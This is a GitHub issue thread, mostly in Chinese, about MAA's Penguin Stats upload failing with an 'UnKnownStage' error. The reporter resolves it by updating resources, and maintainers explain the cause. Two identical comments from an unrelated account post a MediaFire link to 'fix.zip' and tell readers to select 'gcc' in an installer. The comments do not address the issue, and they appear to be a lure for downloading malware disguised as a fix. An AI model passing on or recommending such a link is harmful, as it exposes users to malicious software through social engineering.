### ISSUE TITLE
企鹅物流上传失败

### ISSUE THREAD

**Issue by gzh0204** [MaaAssistantArknights/MaaAssistantArknights#10365]
### 在提问之前...

- [X] 我理解 Issue 是用于反馈和解决问题的，而非吐槽评论区，将尽可能提供更多信息帮助问题解决
- [X] 我填写了简短且清晰明确的标题，以便开发者在翻阅 Issue 列表时能快速确定大致问题。而不是“一个建议”、“卡住了”等
- [X] 我已查看最新测试版本的更新内容，并未提及该 Bug 已被修复的情况
- [X] 我已检查了置顶议题（Pinned Issue），确认我的问题未被提及

### 问题描述

您好，我想咨询一下为什么现在maa上传企鹅物流总显示UnKnownStage，我私以为是前几天企鹅物流网站崩了导致上传不上去，今天重新上了一次发现企鹅物流是好的，但还是上传不了
![image](https://github.com/user-attachments/assets/42898e4d-97ea-4545-a319-1c32fd0fd5f1)

### Version

Core Version: v5.6.0-beta.1

### 日志文件

[gui.log](https://github.com/user-attachments/files/16739084/gui.log)
[asst.log](https://github.com/user-attachments/files/16739085/asst.log)
例如8月25日13：00：44，13：09：09，13：05：34均出现。

### 配置信息

[gui.json](https://github.com/user-attachments/files/16739093/gui.json)
操作系统，Windows 11专业版23H2
模拟器品牌，蓝叠国际版，5.21.210.1023 N64，分辨率1600*900，DPI240，帧率60
未找到加速推理选项，与之相关的有使用独显运行，GPU：NVIDIA GeForce RTX 4060 Laptop GPU/PCLe/SSE2

### 截图

![image](https://github.com/user-attachments/assets/42898e4d-97ea-4545-a319-1c32fd0fd5f1)

**Comment by gzh0204** [comment]
已解决，只需要更新最新资源即可

**Comment by diablo00001** [comment]
Download 
https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file
In the installer menu, select "gcc."

**Comment by diablo00001** [comment]
Download 
https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file
In the installer menu, select "gcc."

**Comment by Saratoga-Official** [comment]
新材料识别是最新资源版本才有的，识别不了新材料就会报错

**Comment by ABA2396** [comment]
> 新材料识别是最新资源版本才有的，识别不了新材料就会报错

倒不是新材料，就是因为这个关卡名不在关卡资源列表里所以不认识
